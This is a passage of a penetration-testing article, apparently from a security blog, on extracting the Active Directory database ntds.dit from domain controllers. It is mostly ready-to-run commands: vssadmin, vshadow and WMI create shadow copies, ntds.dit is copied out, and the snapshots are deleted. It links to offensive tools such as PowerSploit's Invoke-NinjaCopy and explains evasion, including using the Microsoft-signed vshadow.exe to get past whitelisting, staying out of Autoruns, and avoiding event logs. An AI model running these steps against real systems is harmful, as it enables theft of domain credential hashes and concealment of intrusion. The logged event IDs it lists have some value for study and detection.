ntds.dit\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\\windows\\NTDS\\ntds.dit c:\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin delete shadows \u002Ffor=c: \u002Fquiet\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. vshadow.exe\u003C\u002Fh3>\u003Cp>Not supported by default in the system, this tool can be obtained from the Microsoft Windows Software Development Kit (SDK)\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>64-bit systems require the 64-bit version of vshadow.exe\u003C\u002Fp>\u003Cp>Download links for vshadow.exe versions available for different systems:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fedgylogic.com\u002Fblog\u002Fvshadow-exe-versions\u002F\u003C\u002Fp>\u003Ch4>Common commands:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -p -nw C:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cp>-p persistent, not deleted by backup operations or system restart\u003C\u002Fp>\u003Cp>-nw no writers, used to improve creation speed\u003C\u002Fp>\u003Cp>C: corresponds to drive C\u003C\u002Fp>\u003Cp>(3) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow -dx=ShadowCopySetId\u003Cbr>\u003Cbr>vshadow -ds=ShadowCopyId\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Actual testing:\u003C\u002Fh4>\u003Cp>(1) Query current system snapshots\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -q\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Create a snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -p -nw C:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtained SnapshotSetID as {809b77cc-cf9a-4101-b802-08e97d10e613}\u003C\u002Fp>\u003Cp>Obtained SnapshotID as {ef99d039-9a38-4e8b-9f57-e3113d464f76}\u003C\u002Fp>\u003Cp>Obtained shadow copy device name as \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy10\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017990829_3_5d6ab2e711-1.jpeg\">\u003C\u002Fp>\u003Cp>(3) Copy ntds.dit\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy10\\windows\\NTDS\\ntds.dit c:\\ntds.dit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Delete snapshot\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow -dx={809b77cc-cf9a-4101-b802-08e97d10e613}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow -ds={ef99d039-9a38-4e8b-9f57-e3113d464f76}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. vssown.vbs\u003C\u002Fh3>\u003Cp>Reference download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002Fborigue\u002Fptscripts\u002Fmaster\u002Fwindows\u002Fvssown.vbs\u003C\u002Fp>\u003Cp>Essentially operates on ShadowCopy through WMI\u003C\u002Fp>\u003Cp>Query snapshot information via WMI:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ShadowCopy GET DeviceObject,ID,InstallDate \u002FFORMAT:list\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>PowerShell implementation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fsamratashok\u002Fnishang\u002Fblob\u002Fmaster\u002FGather\u002FCopy-VSS.ps1\u003C\u002Fp>\u003Ch3>Extensions\u003C\u002Fh3>\u003Ch4>1. Log files\u003C\u002Fh4>\u003Cp>Invoking Volume Shadow Copy Service generates log files under System, with Event ID 7036\u003C\u002Fp>\u003Cp>Executing ntdsutil snapshot \"activate instance ntds\" create quit quit additionally generates log files with Event ID 98\u003C\u002Fp>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017995435_4_b651f87348-1.jpeg\">\u003C\u002Fp>\u003Ch4>2. Accessing files in snapshots\u003C\u002Fh4>\u003Cp>View snapshot list:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vssadmin list shadows\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Cannot directly access files in \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\u003C\u002Fp>\u003Cp>Files in the snapshot can be accessed by creating symbolic links:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mklink \u002Fd c:\\testvsc \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy12\\\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017998630_5_4920a60005-1.jpeg\">\u003C\u002Fp>\u003Cp>Delete symbolic link:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rd c:\\testvsc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Exploitation idea:\u003C\u002Fp>\u003Cp>If snapshot files exist in the current system, historical files of the system can be accessed\u003C\u002Fp>\u003Ch4>3. Executing commands using vshadow\u003C\u002Fh4>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fbohops.com\u002F2018\u002F02\u002F10\u002Fvshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction\u002F\u003C\u002Fp>\u003Cp>Execute command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>vshadow.exe -nw -exec=c:\\windows\\system32\\notepad.exe c:\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, the background process VSSVC.exe exists, and the Volume Shadow Copy service is shown as running, requiring manual termination of the VSSVC.exe process\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Manually terminating the VSSVC.exe process generates log 7034\u003C\u002Fp>\u003Cp>Exploitation approach:\u003C\u002Fp>\u003Cp>vshadow.exe contains Microsoft signatures, allowing it to bypass certain whitelist restrictions. If set as a startup item, it does not appear in Autoruns' default startup list\u003C\u002Fp>\u003Ch2>0x03 Obtaining the domain controller's NTDS.dit file via NinjaCopy\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FInvoke-NinjaCopy.ps1\u003C\u002Fp>\u003Cp>Does not invoke the Volume Shadow Copy service, thus no log file 7036 is generated\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article compiles various methods for obtaining the domain controller's NTDS.dit file, tests their usage environments, and compares their advantages and disadvantages.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1100,"Onedaysec",4,"published","2026-02-02T07:51:00.064Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Domain Penetration: Extracting NTDS.dit File from Domain Controllers","domain penetration, NTDS.dit, domain controller, Volume Shadow Copy, ntdsutil, vssadmin, vshadow.exe, user hashes, Active Directory, security testing",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],498,497,496,494,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.048Z","2026-07-23T16:01:38.872Z","draft","2026-07-23T16:12:44.208Z"]